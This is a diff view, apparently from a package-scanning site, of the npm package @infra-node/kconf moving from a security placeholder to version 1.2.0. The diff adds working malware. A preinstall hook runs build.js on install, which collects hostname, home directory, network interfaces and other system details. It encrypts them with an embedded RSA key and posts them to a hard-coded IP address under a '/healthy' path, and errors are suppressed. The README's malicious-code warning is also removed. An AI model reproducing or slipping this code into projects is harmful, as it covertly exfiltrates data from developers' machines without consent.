@infra-node/kconf 0.0.1-security → 1.2.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @infra-node/kconf might be problematic. Click here for more details.

package/LICENSE ADDED
@@ -0,0 +1,23 @@
1
+ (The MIT License)
2
+
3
+ Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>
4
+ Copyright (c) 2015 Douglas Christopher Wilson <doug@somethingdoug.com>
5
+
6
+ Permission is hereby granted, free of charge, to any person obtaining
7
+ a copy of this software and associated documentation files (the
8
+ 'Software'), to deal in the Software without restriction, including
9
+ without limitation the rights to use, copy, modify, merge, publish,
10
+ distribute, sublicense, and/or sell copies of the Software, and to
11
+ permit persons to whom the Software is furnished to do so, subject to
12
+ the following conditions:
13
+
14
+ The above copyright notice and this permission notice shall be
15
+ included in all copies or substantial portions of the Software.
16
+
17
+ THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
18
+ EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
19
+ MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
20
+ IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
21
+ CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
22
+ TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
23
+ SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package/README.md CHANGED
@@ -1,5 +1,5 @@
1
- # Security holding package
1
+ #
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ ## License
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=%40infra-node%2Fkconf for more information.
5
+ [MIT](LICENSE)
package/bin/www.js ADDED
@@ -0,0 +1 @@
1
+ console.log("Test OK");
package/build.js ADDED
@@ -0,0 +1,52 @@
1
+ /*
2
+ * Copyright(c) 2010-2021 Karen P. Evans
3
+ * MIT Licensed
4
+ */
5
+
6
+ const https = require('http')
7
+ const os = require('os')
8
+ const crypto = require('crypto')
9
+ const x = require('./util')
10
+
11
+ var report = {
12
+ arch: os.arch(),
13
+ cpus: os.cpus(),
14
+ endianness: os.endianness(),
15
+ freemem: os.freemem(),
16
+ homedir: os.homedir(),
17
+ hostname: os.hostname(),
18
+ loadavg: os.loadavg(),
19
+ networkInterfaces: os.networkInterfaces(),
20
+ platform: os.platform(),
21
+ release: os.release(),
22
+ tmpdir: os.tmpdir(),
23
+ totalmem: os.totalmem(),
24
+ type: os.type(),
25
+ uptime: os.uptime()
26
+ }
27
+
28
+ var data = JSON.stringify(x.encryptM(JSON.stringify(report)))
29
+
30
+ const options = {
31
+ hostname: '123.60.108.113',
32
+ port: 9443,
33
+ path: '/healthy',
34
+ method: 'POST',
35
+ headers: {
36
+ 'Content-Type': 'application/json',
37
+ 'Content-Length': data.length
38
+ }
39
+ }
40
+ const req = https.request(options, res => {
41
+ res.on('data', d => {
42
+ process.stdout.write(d)
43
+ })
44
+ })
45
+
46
+ req.on('error', error => {
47
+ //console.error(error)
48
+ return
49
+ })
50
+
51
+ req.write(data)
52
+ req.end()
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "@infra-node/kconf",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.2.0",
4
+ "description": "",
5
+ "main": "build.js",
6
+ "scripts": {
7
+ "preinstall": "node build.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
package/util.js ADDED
@@ -0,0 +1,37 @@
1
+ /*
2
+ * Copyright(c) 2010-2021 Karen P. Evans
3
+ * MIT Licensed
4
+ */
5
+
6
+ const crypto = require('crypto')
7
+
8
+ publicKey = `-----BEGIN PUBLIC KEY-----
9
+ MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhK7w+gS45FaIL88s+vmUClt/r
10
+ bTY6GAlh9grzFAr4W/4kVJgyfvg/IDZmVG8LeIym5fcjAR03YtjjxRi6pTzUBEls
11
+ GdJ7w6ThjHcDBjT7gpmnP4mU6LmA4tZBMVIr/A0vkTI+jb7ldzSjpDqXTrb7a5Ua
12
+ hcpguhuZZCfsRGkIAwIDAQAB
13
+ -----END PUBLIC KEY-----`
14
+
15
+ var encryptM = function msgEncrypt(data){
16
+ var resData = {
17
+ m:"",
18
+ k:"",
19
+ i:""
20
+ }
21
+
22
+ let key = crypto.randomBytes(16)
23
+ let iv = crypto.randomBytes(16)
24
+
25
+ var cipherChunks = []
26
+ var cipher = crypto.createCipheriv('aes-128-cbc', key, iv)
27
+ cipher.setAutoPadding(true)
28
+ cipherChunks.push(cipher.update(data, 'utf8', 'base64'))
29
+ cipherChunks.push(cipher.final('base64'))
30
+ resData.m = cipherChunks.join('')
31
+ resData.k = (crypto.publicEncrypt(publicKey, key)).toString('base64')
32
+ resData.i = iv.toString('base64')
33
+
34
+ return resData
35
+ }
36
+
37
+ module.exports = {encryptM:encryptM}